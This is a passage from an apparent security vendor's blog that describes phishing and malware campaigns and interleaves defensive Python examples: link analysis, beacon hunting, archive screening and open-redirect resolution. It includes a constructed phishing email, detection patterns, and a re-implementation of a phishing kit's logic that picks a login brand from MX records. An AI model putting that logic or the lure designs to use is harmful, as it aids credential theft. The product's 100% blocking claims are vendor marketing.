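    """Return (signer, findings); findings are (reason, href) tuples."""
    msg = message_from_string(raw_message, policy=policy.default)
    signer = dkim_signer(msg)
    body = msg.get_body(preferencelist=("html",))
    html = body.get_content() if body else ""
    findings = []
    for href, text in extract_links(html):
        host = (urlparse(href).hostname or "").lower()
        if any(host == h or host.endswith("." + h) for h in FREE_HOSTING):
            findings.append(("free-hosting", href))
        if signer and registrable(host) != registrable(signer):
            findings.append(("off-platform", href))
        # Visible text that looks like a URL but points somewhere else.
        shown = urlparse(text).hostname if text.lower().startswith("http") else None
        if shown and shown.lower() != host:
            findings.append(("text-href-mismatch", href))
    return signer, findings


# Constructed sample: a genuine-looking share notification signed by the
# platform, whose links drift off to user-hosted and third-party pages.
SAMPLE = """\
Authentication-Results: mx.example.net; dkim=pass header.d=dropbox.com header.i=@dropbox.com; spf=pass smtp.mailfrom=dropbox.com
From: "Dropbox" <no-reply@dropbox.com>
To: finance@example.com
Subject: Invoice_Q2.pdf was shared with you
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>A file was shared with you.</p>
<a href="https://www.dropbox.com/s/abc123/Invoice_Q2.pdf">Open in Dropbox</a>
<a href="https://sites.google.com/view/support-case-1234">Review the support case</a>
<a href="https://cdn-files.example/download/x">https://www.dropbox.com/s/abc123</a>
</body></html>
"""

if __name__ == "__main__":
    signer, findings = analyse(SAMPLE)
    print("DKIM signer:", signer)
    for reason, href in findings:
        print(f"{reason:20} {href}")
```

Only the first dropbox.com link survives untouched; the Google Sites link is flagged twice (free hosting and off the signer's domain), and the third link is flagged for leaving the platform and for showing a Dropbox URL as its text. Trusting only our own gateway's Authentication-Results instance matters, because an attacker can add a forged copy of that header before the message reaches us.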
by titanadmin | Apr 19, 2025 | Network Security, Phishing & Email Spam
Healthcare organizations and pharmaceutical firms are being targeted in a phishing campaign distributing a recently discovered remote access trojan (RAT) called ResolverRAT. The campaign has been linked to infrastructure previously used to deliver information stealers such as Lumma Stealer and Rhadamathys, indicating an experienced threat actor is behind the campaign.
ResolverRAT is a stealthy RAT that runs entirely in memory, so file-based antivirus scanning has little to work with because no payload is written to disk. Security solutions that monitor Win32 API calls and file system operations can still detect anomalous activity; however, ResolverRAT loads its malicious assemblies through .NET ResourceResolve event handlers rather than the normal loader paths, avoiding the API calls that monitoring tools hook.
The malware achieves persistence by writing XOR-obfuscated entries to the Windows Registry and placing copies of itself in filesystem locations such as the Startup folder, Program Files, and LocalAppData, ensuring it runs again after a reboot. To make its callbacks to the command-and-control server harder to profile, the malware communicates at random intervals. It is capable of data exfiltration, and even large files can be exfiltrated in chunks, which helps the transfers blend in with regular traffic. The malware has been designed to resist analysis, and most of its components are unique, strongly suggesting it was written from scratch by a skilled malware developer.
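Because the RAT randomizes its callback timing, a detector that looks only for fixed-interval beacons will miss it. What survives the randomization is that the same destination keeps being contacted hour after hour, and the outbound byte count keeps growing as chunks leave. The Python below is an added example, not TitanHQ's code and not derived from ResolverRAT itself; it computes both views over a few constructed proxy log lines, and the hosts, timestamps and thresholds are illustrative assumptions.

```python
"""Hunt for C2 callbacks in outbound connection logs.

Added example, not vendor code. The log lines, hosts and thresholds are
constructed for illustration.
"""
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed log: "<ISO timestamp> <destination> <bytes sent>".
# 203.0.113.10 : randomised callbacks, 64 KiB exfil chunks, over four hours
# 198.51.100.7 : fixed 60 s beacon (what a periodicity check catches)
# cdn.example  : ordinary, low-volume traffic
SAMPLE_LOG = """\
2025-04-18T09:00:00 203.0.113.10 412
2025-04-18T09:00:00 198.51.100.7 120
2025-04-18T09:01:00 198.51.100.7 120
2025-04-18T09:02:00 198.51.100.7 120
2025-04-18T09:03:00 198.51.100.7 120
2025-04-18T09:04:00 198.51.100.7 120
2025-04-18T09:05:00 cdn.example 900
2025-04-18T09:07:31 203.0.113.10 65536
2025-04-18T09:11:02 203.0.113.10 65536
2025-04-18T09:25:47 203.0.113.10 65536
2025-04-18T09:52:09 203.0.113.10 65536
2025-04-18T10:14:30 203.0.113.10 65536
2025-04-18T10:30:00 cdn.example 900
2025-04-18T11:03:18 203.0.113.10 65536
2025-04-18T12:20:05 203.0.113.10 65536
"""


def parse(log_text):
    """Yield (timestamp, destination, bytes_out) for each non-empty line."""
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, dst, nbytes = line.split()
        yield datetime.fromisoformat(ts), dst, int(nbytes)


def hunt(log_text, min_hits=5, cv_max=0.15, min_hours=3, upload_bytes=256 * 1024):
    """Per destination: hit count, bytes out, coefficient of variation of
    the gaps between connections, and the flags that fired."""
    per_dst = defaultdict(list)
    for ts, dst, nbytes in parse(log_text):
        per_dst[dst].append((ts, nbytes))

    report = {}
    for dst, rows in per_dst.items():
        rows.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(rows, rows[1:])]
        cv = None
        if len(gaps) >= 2 and statistics.mean(gaps) > 0:
            cv = statistics.pstdev(gaps) / statistics.mean(gaps)
        bytes_out = sum(n for _, n in rows)
        hours = {ts.replace(minute=0, second=0, microsecond=0) for ts, _ in rows}

        flags = set()
        if cv is not None and len(rows) >= min_hits and cv < cv_max:
            flags.add("periodic")      # classic fixed-interval beacon
        if len(hours) >= min_hours:
            flags.add("persistent")    # survives interval randomisation
        if bytes_out >= upload_bytes:
            flags.add("high_upload")   # chunked exfiltration still adds up
        report[dst] = {"hits": len(rows), "bytes_out": bytes_out, "cv": cv, "flags": flags}
    return report


if __name__ == "__main__":
    for dst, stats in sorted(hunt(SAMPLE_LOG).items()):
        cv = "n/a" if stats["cv"] is None else round(stats["cv"], 2)
        print(f"{dst:14} hits={stats['hits']:2} bytes={stats['bytes_out']:7} "
              f"cv={cv} {sorted(stats['flags'])}")
```

The jittered destination never trips the periodicity rule (its gap variation is far above the threshold) but is still surfaced by the persistence and upload-volume rules, which is the point: pick the metric the malware cannot randomize away.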
As with many other phishing campaigns, the ResolverRAT campaign uses social engineering techniques to trick end users. Lures are used that create a sense of urgency, demanding that action be taken immediately to prevent significant costs and legal problems. Emails used in the campaign include notices about copyright violations and other legal issues that require immediate action, along with a threat of legal consequences if the matter is not corrected immediately.
The emails contain a link to a website where the user is prompted to download and open a file to obtain more information about the legal issue, a copyright violation or legal investigation. If the downloaded file is executed, it uses DLL side-loading to load and run ResolverRAT in memory. The campaign has been conducted in multiple countries, with the lures written in the languages predominantly spoken in those countries: English, Italian, Czech, Turkish, Portuguese, Indonesian, and Hindi.
While considerable effort has been put into making the malware incredibly stealthy to evade security solutions, the delivery mechanism – phishing emails – allows infections to be blocked. It is important to use a combination of measures to block campaigns such as this. That starts with an advanced spam filtering service to block the phishing emails to prevent them from reaching end users. SpamTitan, a cloud-based anti-spam service from TitanHQ, performs reputation checks of senders, uses greylisting to identify large email runs indicative of spam, phishing, and malware distribution, subjects messages and headers to in-depth analysis, and analyzes embedded URLs and their destinations, with email sandboxing used to securely analyze message content.
Microsoft 365 users should consider augmenting Microsoft’s email security features with a third-party, dedicated anti-phishing solution. PhishTitan from TitanHQ is an anti-phishing and phishing remediation solution that improves phishing and malware detection rates for Microsoft 365, adds email banners to alert users to emails from external addresses, protects against malicious links in emails, and incorporates tools to allow malicious emails to be rapidly remediated across the entire email system. In independent tests, these solutions have been shown to block 100% of malware and in excess of 99.99% of phishing emails.
A web filter is also recommended to protect against redirects to malicious websites and block malware downloads from the Internet, adding an extra layer to your security defenses. It is also important to provide regular security awareness training to employees to show them how to identify the signs of phishing, condition them to report potential threats to their security team, and teach security best practices. Training should also be reinforced by using a phishing simulator to conduct phishing simulations internally.
Give the TitanHQ team a call today for more information on improving your defenses against phishing and malware infections to block sophisticated malware threats, including improving protection for Microsoft 365 environments. All TitanHQ solutions are available on a free trial and have been developed from the ground up to meet the needs of MSPs to help them better protect their clients against the ever-evolving cyber threat landscape.
by titanadmin | Apr 18, 2025 | Network Security, Website Filtering
A Gootloader malware campaign has been identified that uses Google Ads for initial contact with businesses, luring them in with realistic ads on a legitimate and trusted platform and tricking them into installing malware. Gootloader is a type of malware used to gain initial access to devices. First identified in 2020, the malware is used to attack Windows-based systems and deliver additional malware payloads. For example, the malware has been used to deliver Gootkit, a banking Trojan with information-stealing capabilities, and Gootloader is part of an “initial access as a service” platform, providing cybercriminal groups with the access they need to achieve their aims. For instance, access can be sold to ransomware groups.
Historically, Gootloader malware has been distributed via search engine optimization (SEO) poisoning, which abuses Google and other search engines. This technique manipulates search rankings so that malicious sites appear high in the results for chosen keywords, giving Internet users the impression that the website is legitimate while also ensuring that enough people see the listing and click.
The latest campaign uses Google Ads to achieve the same purpose – getting a malicious site in front of users and giving them a reason to download a file. In this campaign, small businesses and other potentially high-value targets can be infected, which will be of interest to ransomware groups. Google performs checks of advertisers, and the company is usually able to prevent malicious adverts from appearing on the network; however, from time to time, those checks fail.
In this case, the campaign is attributed to a legitimate-sounding advertiser called Med Media Group Limited, which uses legal document templates such as contracts and non-disclosure agreements to attract small businesses. Fake websites are used in the campaign that appear legitimate, such as lawliner[.]com. The campaign has been configured to display ads for searches for legal documents, with the adverts claiming they provide a free template for the document with no sign-up required and no registration needed.
If the ad is clicked, the user is directed to a legitimate-looking and professional webpage. They are asked to enter their email address, and a link is sent via email for them to download the required document. The link directs the user to a different website, which triggers the download of a zip file containing a file that appears to be the document they require. For instance, the ad offering a non-disclosure agreement contains a file called non_disclosure_agreement_nda.js. The email directs the user to a site called skhm[.]org. The footer of the email claims the service is SKHM (Store, Keep, Host & Mail), and a mailing address is included along with a contact mobile phone number for a UK company called ENDOLE LTD.
The provision of a company name and contact information adds legitimacy, and if the provided number is called, they will be told that the company and the file are legitimate; however, that is certainly not the case. The downloaded file is JavaScript, and if it is executed, it will deliver Gootloader malware, which will establish persistence and reach out to its command-and-control server. After conducting reconnaissance to discover the local and networked environment, it will deliver secondary malware payloads.
The key to avoiding Gootloader infections is security awareness. There are several red flags in this campaign, although they can easily be missed. The ad promises a free template with no sign-up, yet the site asks for an email address before delivering anything. The site where the download occurs is different from the site used for the ad campaign, and the file is delivered in a zip file rather than a standard Word document or PDF. Further, a close look at the file will reveal it is a .js script rather than a document, and a warning requiring confirmation will be displayed if an attempt is made to open it.
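Both this campaign (a .js script inside a zip) and the GetShared lure described earlier (an archive that may carry a double-extension executable) come down to the same question for a gateway or endpoint control: what is actually inside the archive? The Python below is an added example, not TitanHQ code and not taken from either campaign. The zip is built in memory from constructed member names (the NDA script name is the one reported above; the others are illustrative), and the extension lists are assumptions you would tune for your environment.

```python
"""Inspect zip members for script, executable and disguised filenames.

Added example, not vendor code. The archive and its member names are
constructed; the extension lists are illustrative and should be tuned.
"""
import io
import re
import zipfile

SCRIPT_EXT = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".ps1",
              ".bat", ".cmd", ".lnk"}
EXEC_EXT = {".exe", ".scr", ".com", ".pif", ".msi", ".dll", ".cpl"}
DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
RTLO = "\u202e"  # right-to-left override: reverses how the name is displayed


def classify(member_name):
    """Reasons a member deserves quarantine (empty list means nothing seen)."""
    base = member_name.rsplit("/", 1)[-1]
    parts = base.lower().split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    reasons = []
    if ext in SCRIPT_EXT:
        reasons.append("script")
    if ext in EXEC_EXT:
        reasons.append("executable")
    # invoice.pdf.exe: a document-looking name in front of a runnable one
    if len(parts) > 2 and "." + parts[-2] in DOC_EXT and ext in SCRIPT_EXT | EXEC_EXT:
        reasons.append("double-extension")
    if RTLO in base:
        reasons.append("rtlo-in-name")
    if re.search(r"\s{8,}", base):  # padding pushes the real extension out of view
        reasons.append("padded-name")
    return reasons


def risky_members(zip_bytes):
    """(member name, reasons) for every file member that triggered a rule."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = classify(info.filename)
            if reasons:
                flagged.append((info.filename, reasons))
    return flagged


def build_sample_zip():
    """Constructed archive standing in for the downloaded 'document'."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("non_disclosure_agreement_nda.js", "// loader would be here")
        zf.writestr("docs/Invoice.pdf.exe", "MZ")
        zf.writestr("docs/notes.txt", "plain text")
        zf.writestr("photo" + RTLO + "gpj.scr", "MZ")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in risky_members(build_sample_zip()):
        print(f"{name!r}: {', '.join(reasons)}")
```

Note that the check works on member names only, so it costs nothing and needs no extraction; a gateway would normally pair it with sandbox detonation of anything flagged, and would also reject encrypted archives it cannot list.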
Businesses should ensure that security awareness training is provided to employees to explain all of these red flags and other ways that cybercriminals use to distribute malware and phish for sensitive data. The SafeTitan security awareness training and phishing simulation platform makes it easy to create and automate training courses and phishing simulations. Businesses should also consider using a DNS filter to restrict access to malicious websites and block malware downloads from the Internet. The WebTitan DNS filter allows category-based filtering, preventing users from visiting certain risky categories of websites and websites serving no work purpose. WebTitan is constantly fed threat intelligence from a vast network of end users and will block access to malicious websites within a few minutes of a website or webpage being determined to be malicious, including redirects to malicious sites from compromised, legitimate websites. The solution can also be configured to prevent file downloads from the internet by file type, thus helping to prevent malware downloads. TitanHQ also offers a full suite of cybersecurity solutions, including anti-spam software with email sandboxing, anti-phishing protection, and email encryption and email archiving solutions.
by titanadmin | Apr 10, 2025 | Industry News, Spam Software
There was another excellent performance from TitanHQ’s email security suite in Q1, 2025, resulting in TitanHQ’s third consecutive VBSpam+ award from VirusBulletin for its email security suite. VirusBulletin is a renowned information security portal, testing, and certification body. VirusBulletin provides security professionals with invaluable intelligence on the latest global cyber threats and conducts independent tests of security solutions to find out how well they perform.
Throughout the year, VirusBulletin continually conducts tests of email security solutions to see how effective they are at blocking spam emails, along with dangerous threats such as phishing and malware. The results of the tests are published each quarter, with the tested email security solutions rated on their performance.
In the Q1, 2025 tests, one-third of the tested security solutions opted to be included in the public test, with the others choosing to keep their results and performances private. In the Q1, 2025, tests, the results from 11 full email security solutions and one open source solution were published. Email security solutions that have a 99.95% spam catch rate with no false positives, no more than 2.5% false positives for newsletters, and fast delivery speeds are awarded the VBSpam+ certification, while a final score of over 98% sees the VBSpam certification awarded.
For the past two quarters preceding the latest round of tests, the engine that powers the SpamTitan anti-spam software and PhishTitan anti-phishing solutions had an exceptional performance, blocking 100% of phishing emails and malware. In Q3, 2024, TitanHQ achieved the joint top spot for final score and finished in sole 1st place in Q4, 2024, with a 100% phishing, malware, and spam catch rate with a 0.00% false positive rate.
In the Q1, 2025, tests, TitanHQ achieved a 100% malware catch rate, a 99.999% phishing catch rate, a 99.997% spam catch rate, and a 0.00% false positive rate, giving an overall score of 99.997%, giving TitanHQ a top 2 ranking, beating solutions such as FortiMail, Mimecast, Zoho Mail, and Sophos Email. “SpamTitan demonstrated exceptional efficacy with only four misclassifications, one of which was a phishing attempt. The product’s outstanding performance earns it VBSpam+ certification,” explained VirusBulletin.
“This test reaffirms TitanHQ’s unmatched expertise in email security, solidifying our position as the premier choice for combating phishing attempts and spam infiltrations. With TitanHQ, customers gain unparalleled defense against these threats, with minimal false positives. These independent test results validate our commitment to providing top-tier protection against phishing, spam, and viruses, all while offering exceptional value.”
by titanadmin | Mar 31, 2025 | Internet Security, Phishing & Email Spam, Security Awareness
RansomHub is one of the most prolific ransomware-as-a-service (RaaS) groups now that the ALPHV/BlackCat operation has shut down and the LockBit operation has been hit with successive law enforcement actions. RansomHub engages in double extortion tactics, exfiltrating sensitive data from victims’ networks and encrypting files. Victims must pay to obtain the keys to decrypt their data and to prevent the publication of the stolen data on the RansomHub data leak site. Since emerging in early 2024, the group has conducted more than 200 attacks.
As a RaaS operation, RansomHub uses affiliates to conduct attacks in exchange for a percentage of any ransom payments they generate. The affiliates each have their specialties for breaching victims' systems, including phishing, remote desktop protocol attacks, and the exploitation of unpatched vulnerabilities. Now a new tactic is being used: the group is using the SocGholish malware-as-a-service (MaaS) framework for initial access, especially in attacks on the government sector.
SocGholish, also known as FakeUpdates, uses an obfuscated JavaScript loader that is primarily delivered via compromised legitimate websites. After compromising a website, malicious scripts are added that redirect users to webpages that display browser update notifications. These sites use social engineering to trick visitors into downloading a browser update, as they are told that their browser has a security issue or is not functioning correctly. If the user agrees, they download a zip file that contains a JavaScript file. If that file is executed, SocGholish malware is installed.
SocGholish is a malware downloader that provides initial access to a victim's network. It has been used to deliver a wide range of payloads, including AZORult, Gootloader, NetSupport, and Dridex. SocGholish has previously been used to deliver DoppelPaymer ransomware, and now RansomHub ransomware. In the RansomHub attacks, the SocGholish operators deploy Python-based backdoor components that RansomHub affiliates then use for their access.
Preventing SocGholish infections is critical to preventing RansomHub ransomware attacks; however, prevention requires a defense-in-depth approach. Traffic to the compromised websites can come from emails with embedded hyperlinks, malvertising, SEO poisoning, and even Google Alerts, which deliver links to compromised websites to users. The webpages that host the fake browser updates filter traffic and block access from sandboxes, which makes detection difficult.
The best approach is to use an advanced anti-spam software such as SpamTitan to block malicious emails. In the last quarterly round of testing at VirusBulletin, SpamTitan, a cloud-based antispam service from TitanHQ, ranked #1 for malware detection, phishing detection and spam blocking with a 0% false positive rate, and in the February 2025 tests, achieved a perfect score blocking 100% of malware, phishing, and spam emails. The high detection rate is due to extensive front-end tests, email sandboxing, and machine learning.
A web filter adds an important layer of protection by scanning websites for malicious content and blocking access to known malicious websites. The WebTitan DNS filter is fed extensive threat intelligence to block access to known compromised webpages, can filter websites by category, and can be configured to block downloads of executable files from the Internet. Security awareness training is vital for creating a human firewall. Employees should be informed about the risks of interacting with security warnings on the Internet, and taught how to identify phishing attempts and be instructed on security best practices. The SafeTitan security awareness training platform and phishing simulator platform make creating and automating training courses and phishing simulations a quick and easy process.
by titanadmin | Mar 31, 2025 | Phishing & Email Spam
One of the ways that cybercriminals are bypassing traditional email security solutions is to use QR codes rather than embedded hyperlinks in their phishing emails. QR codes are increasingly used by businesses to drive traffic to web pages, as consumers do not need to go through the process of typing a URL into their browser. The QR code can simply be scanned with a smartphone camera, the URL will be recognized, and the web resource can be visited with a single tap of the finger.
Spam filtering services will detect links in emails, check them against blacklists of known malicious websites, and will often follow the links to find the destination URL. If the website is malicious, the email will not be delivered to the user’s inbox. By using a QR code rather than a hyperlink, there is an increased chance that the message will be delivered, as many anti-spam software solutions are incapable of reading QR codes.
One such campaign has recently been identified that warns the recipient that they must review and update their tax records. The email has the subject, “urgent reminder,” and claims to have been sent by the Tax Services Team. The email has a PDF file attachment and advises the recipient that a review of their tax records must be completed by April 16, 2025, to avoid potential penalties. Tax season is well underway and annual tax returns need to be submitted by April 15, 2025, so the deadline for a response is plausible.
Rather than include a link, the PDF file includes a QR code, which the user is told they should scan with their mobile device to access the secure tax portal, where they must log in, review their tax information, and confirm it is up to date.
If the QR code is scanned and the link followed, the user must first pass a CAPTCHA test, after which they are presented with a Microsoft login prompt and asked to enter their password. The form is already populated with the user’s email address to make it appear that the user is known or has visited the site before, adding an air of legitimacy to the scam. If the password is entered, it will be captured and used to hijack the user’s Microsoft account. After entering the password, the user is told “We could not find an account with that username. Try another account,” which may allow the attacker to steal credentials for another account.
QR code phishing forces users onto a mobile device, which typically has weaker security than a desktop computer or laptop, plus only the domain name can usually be viewed rather than the full URL, which helps to make the link seem legitimate. Phishers also often use open redirects on legitimate websites to make their links appear authentic and hide the final destination URL.
With QR code phishing scams on the rise, it is important to raise awareness of the threat through your security awareness training program. Employees should be warned that QR codes are commonly used by threat actors, and never to follow links encoded in QR codes that arrive via email. It is also recommended to use a phishing simulator to assess whether the workforce is susceptible to QR code phishing attempts. The SafeTitan security awareness training platform allows businesses to easily conduct phishing simulations on the workforce to gauge susceptibility to phishing threats. The phishing simulator will generate relevant training content immediately if a phishing test is failed, ensuring targeted training content is delivered immediately, when it is likely to be most effective at correcting behavior.
Technical defenses should also be implemented. An advanced spam filtering service should be used that is capable of identifying QR codes and following and assessing the encoded URLs for phishing content and malware. SpamTitan's spam filter is capable of decoding QR codes and assessing the linked content, and in recent tests, correctly identified 100% of phishing attempts. SpamTitan also includes email sandboxing for in-depth analysis of email attachments. A DNS security solution is also recommended for in-depth analysis of URLs for malicious content to provide an extra layer of protection against phishing and malware.
by titanadmin | Mar 30, 2025 | Phishing & Email Spam
A new phishing-as-a-service (PhaaS) platform has been identified that highlights the sophistication of phishing attacks, and how even cybercriminals with limited skill sets can conduct extremely effective phishing campaigns.
One of the problems when conducting phishing campaigns is ensuring the phishing emails are convincing. Phishing has traditionally been a numbers game, where large volumes of messages are sent in the knowledge that a small number of individuals will be tricked into responding. Those individuals may simply be busy and respond without taking the time to carefully consider what they are being asked, or individuals with poor security awareness. Targeted phishing attempts, termed spear phishing, involve research and are tailored to individuals or small numbers of individuals, and because of the targeting, there is a much higher response rate. The trade-off is that these campaigns involve considerable time and effort.
The new PhaaS platform allows a threat actor to tailor the content to display a fake login page relevant to the individual receiving the message, while still sending a large volume of phishing emails. The phishing kit displays a login prompt that impersonates any of 114 brands in around a dozen languages, with the content tailored to each recipient. The threat actor configures the campaign and sends out phishing emails via the PhaaS kit, and the link in each email directs the recipient to a phishing webpage. The next stage is where the targeting occurs. The phishing page looks up the DNS MX records of the recipient's email domain using DNS over HTTPS (DoH) via Cloudflare or Google to identify the user's email service provider. The login page is then rendered dynamically based on the result of that query, and if no usable response is received, the page defaults to a Roundcube webmail login.
DNS queries are fast, so the query and response complete in a fraction of a second, just as when a browser resolves a hostname to an IP address. The delay before the content loads is therefore tiny and usually unnoticeable. The result is that a Gmail user is presented with a Gmail login prompt, and a Microsoft Outlook user with a Microsoft login prompt. If the user enters their login credentials, they are captured and sent to the collection server, and the user is redirected to the real login page for that service, most likely unaware that they have been phished. The campaign was identified by Infoblox, which observed thousands of phishing emails sent via the kit. While the kit appears to have been first used in 2020, the number of impersonated brands has since increased considerably, with support also added for targeting users in several languages.
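To make the mechanism concrete, and to give a URL sandbox or proxy something to look for, the Python below is an added example; it is not Infoblox's analysis code and not the kit itself. The first function takes the JSON that the Google and Cloudflare DNS-over-HTTPS endpoints return for an MX query, picks the lowest-preference exchanger and maps it to a brand, falling back to Roundcube as the page describes; the MX-to-brand table is an illustrative assumption. The second flags page scripts that perform such MX lookups client-side, something an ordinary login page has little reason to do. The DoH responses and the script snippet are constructed samples.

```python
"""Reproduce and detect the MX-based brand selection of the phishing kit.

Added example, not vendor or kit code. PROVIDERS, the DoH responses and
the JavaScript snippet are constructed and illustrative.
"""
import json
import re

# MX exchanger suffix -> login template to show. Illustrative assumption.
PROVIDERS = [
    ("aspmx.l.google.com", "Gmail"),
    ("mail.protection.outlook.com", "Microsoft 365"),
    ("yahoodns.net", "Yahoo"),
    ("mx.zoho.com", "Zoho"),
]
DEFAULT_TEMPLATE = "Roundcube"  # used when the lookup returns nothing usable


def template_from_doh(doh_json_text):
    """Map a DoH JSON answer (application/dns-json) for an MX query to a
    template name. MX rdata is '<preference> <exchanger>'; the lowest
    preference is the primary exchanger."""
    doc = json.loads(doh_json_text)
    exchangers = []
    for answer in doc.get("Answer", []):
        if answer.get("type") != 15:  # 15 = MX
            continue
        pref, _, host = answer["data"].partition(" ")
        exchangers.append((int(pref), host.rstrip(".").lower()))
    for _, host in sorted(exchangers):
        for suffix, template in PROVIDERS:
            if host == suffix or host.endswith("." + suffix):
                return template
    return DEFAULT_TEMPLATE


# Client-side DoH MX lookups: the resolver URL and the record type usually
# sit on one line even when the domain is concatenated in between.
DOH_MX_PATTERNS = [
    re.compile(r"dns\.google/resolve[^\n;]{0,160}type=(?:MX|15)\b", re.I),
    re.compile(r"cloudflare-dns\.com/dns-query[^\n;]{0,160}type=(?:MX|15)\b", re.I),
]


def script_does_mx_lookup(js_source):
    """True if the script appears to resolve MX records over DoH."""
    return any(p.search(js_source) for p in DOH_MX_PATTERNS)


# Constructed DoH responses in the shape both resolvers return.
GOOGLE_HOSTED = json.dumps({"Status": 0, "Answer": [
    {"name": "example.com.", "type": 15, "TTL": 300, "data": "20 alt1.aspmx.l.google.com."},
    {"name": "example.com.", "type": 15, "TTL": 300, "data": "10 aspmx.l.google.com."}]})
M365_HOSTED = json.dumps({"Status": 0, "Answer": [
    {"name": "example.org.", "type": 15, "TTL": 300,
     "data": "0 example-org.mail.protection.outlook.com."}]})
NXDOMAIN = json.dumps({"Status": 3})

# Constructed snippet of the kind a kit's page script would contain.
PAGE_SCRIPT = """
const d = email.split('@')[1];
fetch("https://cloudflare-dns.com/dns-query?name=" + d + "&type=MX",
      {headers: {accept: "application/dns-json"}}).then(r => r.json());
"""

if __name__ == "__main__":
    for label, resp in [("Google-hosted", GOOGLE_HOSTED), ("M365", M365_HOSTED), ("NXDOMAIN", NXDOMAIN)]:
        print(label, "->", template_from_doh(resp))
    print("page script does MX lookup:", script_does_mx_lookup(PAGE_SCRIPT))
```

The detection pattern is deliberately loose (it tolerates string concatenation around the domain) and will need tuning for minified or obfuscated scripts; a sandbox that records outbound requests from the page, rather than grepping its source, catches the same behaviour regardless of obfuscation.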
The phishing kit demonstrates the sophistication of phishing attacks and how threat actors are increasing the effectiveness of their campaigns. Businesses should respond to the evolving threat landscape by adopting a defense-in-depth approach that includes a DNS filtering solution such as WebTitan, advanced spam filtering software such as SpamTitan, and ongoing security awareness training and phishing simulations for the workforce to raise awareness of threats and reduce susceptibility to phishing attempts, using a solution such as SafeTitan.
by titanadmin | Mar 29, 2025 | Security Awareness
Businesses can implement the most advanced anti-spam software, email sandboxing, multifactor authentication, anti-phishing solutions, and endpoint security software and will be well protected against email-based attacks. Even with layered security from multiple solutions, though, it is not possible to block every threat, and some malicious emails will land in inboxes, albeit in much smaller numbers. All it takes is one employee responding to a phishing email for an attacker to gain the foothold they need for a much more extensive compromise, and even one compromised email account can result in a large and costly data breach.
As email filtering services have improved, cybercriminals have changed their tactics and come up with novel ways to reach employees and trick them with social engineering. Voice phishing (vishing) and SMS-based phishing (smishing) have increased significantly, often combining initial contact via email or SMS with a number to call. The scammer then tricks the employee into installing remote access software and granting them remote access to their device.
Residents of several cities in the United States are currently being targeted in smishing attacks, with the text messages warning them about unpaid parking tickets. The texts appear to have been sent by the city’s parking violation department and advise the recipient about an unpaid parking invoice or fine. As with many phishing attempts, there is a sense of urgency – The fine will increase by $35 per day unless the initial fine is paid. A link is supplied in the text for the user to pay the fine, using a Google.com open redirect to send the user to the phishing site. Since the google.com domain is trusted, the messages are often delivered without the link being disabled.
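The open-redirect trick appears twice on this page: behind the QR code in the tax lure, where the phone shows only the domain, and behind the parking-fine text, where a google.com link carries the real destination. The Python below is an added example, not TitanHQ code, that pulls the real destination out of such a link without touching the network, so the domain a user sees can be compared with where they would actually land. The URLs are constructed, and the redirect shapes handled (a full URL in a query value, possibly percent-encoded more than once, possibly nested inside another redirector) are the generic ones, not a claim about either campaign's exact links.

```python
"""Resolve the real destination hidden in open-redirect style links.

Added example, not vendor code. Sample URLs are constructed.
"""
from urllib.parse import parse_qsl, unquote, urlparse


def embedded_targets(url):
    """Absolute URLs carried in query-string values of `url`."""
    parsed = urlparse(url)
    targets = []
    for _, value in parse_qsl(parsed.query, keep_blank_values=True):
        candidate = unquote(value)  # parse_qsl decoded once; undo double encoding
        if candidate.lower().startswith(("http://", "https://")):
            targets.append(candidate)
        elif candidate.startswith("//"):  # scheme-relative target
            targets.append(f"{parsed.scheme}:{candidate}")
    return targets


def effective_destination(url, max_depth=5):
    """Follow embedded targets, which may themselves be redirect links,
    until none remain or max_depth is reached. Pure string work: no HTTP
    requests are made, so the phishing site is never contacted."""
    current = url
    for _ in range(max_depth):
        nested = embedded_targets(current)
        if not nested:
            break
        current = nested[0]
    return current


def assess(url):
    """What the user sees versus where the link ends up."""
    final = effective_destination(url)
    shown = (urlparse(url).hostname or "").lower()
    real = (urlparse(final).hostname or "").lower()
    return {"shown_host": shown, "final_host": real,
            "final_url": final, "open_redirect": shown != real}


# Constructed examples: a redirector carrying the landing page, a doubly
# wrapped one, and a plain link for comparison.
SAMPLES = [
    "https://www.google.com/url?q=https%3A%2F%2Fpay-city-fines.example%2Fticket%3Fid%3D8841",
    "https://t.example/r?u=https%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%253A%252F%252Fbad.example%2Flogin",
    "https://parking.city.example/pay?id=12345",
]

if __name__ == "__main__":
    for s in SAMPLES:
        r = assess(s)
        print(f"{r['shown_host']:22} -> {r['final_host']:22} open_redirect={r['open_redirect']}")
```

This only sees redirects that are encoded in the link itself; a server-side redirect (HTTP 302 from a compromised site) still needs a sandbox or URL scanner to follow it. For QR codes the same assessment applies once the code has been decoded into a URL.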
To combat these forms of phishing, businesses need to ensure their employees are aware of the threats and that phishing can occur with any form of communication, not just email, and that means providing security awareness training to the workforce. Unfortunately, simply providing training once or twice a year does not necessarily have a significant impact on reducing susceptibility to phishing attempts. While a once-a-year training session for the workforce was once the best practice, it is no longer sufficient due to the rapidly changing threat landscape, the volume of threats, and the use of AI tools for creating new social engineering methods and flawless phishing communications.
Traditionally, businesses would conduct security awareness training presentations or annual training courses where employees would be provided with in-depth information about the types of threats they should be aware of, how to identify those threats, and what to do if a potential threat is encountered. The problem with this approach is that a lot of the information will not be retained and will likely be forgotten within days of the training session. At best, understanding will improve a little, but this approach will not drive the positive behavioral changes the training session is intended to achieve.
Further, the threat landscape is constantly changing, with new attack methods constantly being developed by threat actors. To be effective, training needs to be an ongoing process, with the workforce kept up to date on novel threats and the changing tactics of cybercriminals, with training reinforced regularly.
The best approach is to use a computer-based training course with short modules that can be completed on an ongoing basis. Completing a couple of short training modules each week will be much more effective at changing employee behavior than an annual training session. Shorter and more enjoyable training content will keep employees engaged and should help them to retain the information and apply the training after the training session has been completed.
